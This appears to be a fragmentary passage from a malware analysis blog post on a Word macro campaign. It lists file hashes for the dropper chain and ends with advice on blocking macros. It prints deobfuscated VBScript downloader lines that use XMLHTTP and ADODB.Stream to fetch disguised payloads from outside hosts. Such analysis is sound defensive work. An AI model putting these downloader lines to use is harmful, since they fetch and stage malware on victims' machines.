JHyygUBjdfg.Open GET , http://savepic.org/7260406.jpg
















dim sdfsdfsdf: Set sdfsdfsdf = createobject(Microsoft.XMLHTTP )
dim dsfsdfsdfg: Set dsfsdfsdfg = createobject(Adodb.Stream )
sdfsdfsdf.Open GET , http://savepic.net/6856149.jpg












Dropper, payload, related files:

AY19358KXN.doc (original file)
SHA1: b2c793b1cf2cf11954492fd52e22a3b8a96dac15
VirusTotal

Extracted macro (I named it AY.vb)
SHA1: 79b0d7a7fe917583bc4f73ce1dbffc5497b6974d
VirusTotal

JGuigbjbff3f.vbs (dropped VBscript file)
SHA1: c8a914fdc18d43aabbf84732b97676bd17dc0f54
VirusTotal
Deobfuscated VBscript

o8237423.exe (dropper)
SHA1: 7edc7afb424e6f8fc5fb5bae3681195800ca8330
VirusTotal

DInput8.dll (payload)
SHA1: 8bfe59646bdf6591fa8213b30720553d78357a99
VirusTotal





Prevention



Conclusion

It seems obvious that malware authors are keeping up-to-date with the latest news and as such adapting their campaigns as well. Better be safe than sorry and don't trust anything sent via email. ;-)

If you're in an organisation, you might want to consider blocking the execution of all macros (or only allow the ones that are digitally signed if there's really no other choice) by using GPO.

You can find those templates here:

Note: starting from Office 2010, macros are disabled by default.


Resources